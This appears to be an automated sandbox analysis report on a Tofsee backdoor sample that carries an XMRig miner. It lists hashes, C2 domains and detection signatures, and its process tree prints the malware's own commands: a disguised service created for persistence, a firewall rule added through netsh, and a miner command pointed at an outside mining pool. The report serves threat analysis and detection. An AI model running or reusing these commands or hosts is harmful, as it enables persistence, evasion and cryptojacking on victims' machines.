Overview

overview

10

Static

static

dridex

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/01/2023, 20:14

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    6d916dbb2d4e1841b92b056a4decf35c528e1d9ed0ced7db8097ebe283ff0fc7.exe

  • Size

    321KB

  • MD5

    1a6066d8b20352b1c9b472e8b044df13

  • SHA1

    4f7422dadfd481148db3fcd9e9e0ecb43eb00746

  • SHA256

    6d916dbb2d4e1841b92b056a4decf35c528e1d9ed0ced7db8097ebe283ff0fc7

  • SHA512

    a8c9670859f5ab9c0ecf3d01eaeef3c2b047b00a2a4b804a5582d56422a4aceaae5495bae750118481c0573a7ab86204c3190e416711ebe14ddb1aa9b234a856

  • SSDEEP

    6144:ijHJxuLy/3u8ryU2/fAM4MS/sivsEi6WbP:ijHJAe/3u8rfuoMeECi

Score
10/10
tofseexmrigevasionminerpersistencetrojan

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 2 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6d916dbb2d4e1841b92b056a4decf35c528e1d9ed0ced7db8097ebe283ff0fc7.exe
    "C:\Users\Admin\AppData\Local\Temp\6d916dbb2d4e1841b92b056a4decf35c528e1d9ed0ced7db8097ebe283ff0fc7.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4936
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\sukiolcg\
      2⤵
        PID:4212
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\czturzpw.exe" C:\Windows\SysWOW64\sukiolcg\
        2⤵
          PID:2612
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create sukiolcg binPath= "C:\Windows\SysWOW64\sukiolcg\czturzpw.exe /d\"C:\Users\Admin\AppData\Local\Temp\6d916dbb2d4e1841b92b056a4decf35c528e1d9ed0ced7db8097ebe283ff0fc7.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:3412
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description sukiolcg "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:380
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start sukiolcg
          2⤵
          • Launches sc.exe
          PID:5092
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:2900
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 668
          2⤵
          • Program crash
          PID:3756
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4936 -ip 4936
        1⤵
          PID:4440
        • C:\Windows\SysWOW64\sukiolcg\czturzpw.exe
          C:\Windows\SysWOW64\sukiolcg\czturzpw.exe /d"C:\Users\Admin\AppData\Local\Temp\6d916dbb2d4e1841b92b056a4decf35c528e1d9ed0ced7db8097ebe283ff0fc7.exe"
          1⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:3576
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe
            2⤵
            • Sets service image path in registry
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Modifies data under HKEY_USERS
            • Suspicious use of WriteProcessMemory
            PID:2216
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2252
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 532
            2⤵
            • Program crash
            PID:1504
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3576 -ip 3576
          1⤵
            PID:1764

          Network

                MITRE ATT&CK Enterprise v6

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Temp\czturzpw.exe
                  Filesize

                  11.8MB

                  MD5

                  fa9f9a796be2dd8406cfe0f337d38ae9

                  SHA1

                  63bc1a7286627f2ccc329713d3fe93789930f69e

                  SHA256

                  6a0b2c21ce247aa3caabdbc522953326cab2dac91ec2ca18ab1653b6552ea38c

                  SHA512

                  53aa6a62ec7b54d6543a516ab965709cf65ff404eb120204f8329568058fb513929e0f96693081a15defd73d35b0f7fa333ce7f69f1d38e63d39fc5d622393b6

                  Download Submit

                • C:\Windows\SysWOW64\sukiolcg\czturzpw.exe
                  Filesize

                  11.8MB

                  MD5

                  fa9f9a796be2dd8406cfe0f337d38ae9

                  SHA1

                  63bc1a7286627f2ccc329713d3fe93789930f69e

                  SHA256

                  6a0b2c21ce247aa3caabdbc522953326cab2dac91ec2ca18ab1653b6552ea38c

                  SHA512

                  53aa6a62ec7b54d6543a516ab965709cf65ff404eb120204f8329568058fb513929e0f96693081a15defd73d35b0f7fa333ce7f69f1d38e63d39fc5d622393b6

                  Download Submit

                • memory/2216-159-0x0000000001FE0000-0x0000000001FF0000-memory.dmp

                  Filesize

                  64KB

                  Download

                • memory/2216-162-0x0000000001FF0000-0x0000000001FF5000-memory.dmp

                  Filesize

                  20KB

                  Download

                • memory/2216-168-0x0000000002BD0000-0x0000000002BD7000-memory.dmp

                  Filesize

                  28KB

                  Download

                • memory/2216-165-0x0000000007700000-0x0000000007B0B000-memory.dmp

                  Filesize

                  4.0MB

                  Download

                • memory/2216-156-0x0000000001FD0000-0x0000000001FD6000-memory.dmp

                  Filesize

                  24KB

                  Download

                • memory/2216-153-0x0000000002800000-0x0000000002A0F000-memory.dmp

                  Filesize

                  2.1MB

                  Download

                • memory/2216-152-0x0000000000950000-0x0000000000965000-memory.dmp

                  Filesize

                  84KB

                  Download

                • memory/2216-150-0x0000000000950000-0x0000000000965000-memory.dmp

                  Filesize

                  84KB

                  Download

                • memory/2216-145-0x0000000000950000-0x0000000000965000-memory.dmp

                  Filesize

                  84KB

                  Download

                • memory/2252-177-0x0000000000420000-0x0000000000511000-memory.dmp

                  Filesize

                  964KB

                  Download

                • memory/2252-173-0x0000000000420000-0x0000000000511000-memory.dmp

                  Filesize

                  964KB

                  Download

                • memory/2252-172-0x0000000000421000-0x00000000004F2000-memory.dmp

                  Filesize

                  836KB

                  Download

                • memory/3576-151-0x0000000000400000-0x0000000003013000-memory.dmp

                  Filesize

                  44.1MB

                  Download

                • memory/3576-149-0x0000000000400000-0x0000000003013000-memory.dmp

                  Filesize

                  44.1MB

                  Download

                • memory/3576-148-0x00000000033A9000-0x00000000033BE000-memory.dmp

                  Filesize

                  84KB

                  Download

                • memory/4936-132-0x00000000032BD000-0x00000000032D2000-memory.dmp

                  Filesize

                  84KB

                  Download

                • memory/4936-135-0x0000000000400000-0x0000000003013000-memory.dmp

                  Filesize

                  44.1MB

                  Download

                • memory/4936-143-0x0000000000400000-0x0000000003013000-memory.dmp

                  Filesize

                  44.1MB

                  Download

                • memory/4936-133-0x0000000003090000-0x00000000030A3000-memory.dmp

                  Filesize

                  76KB

                  Download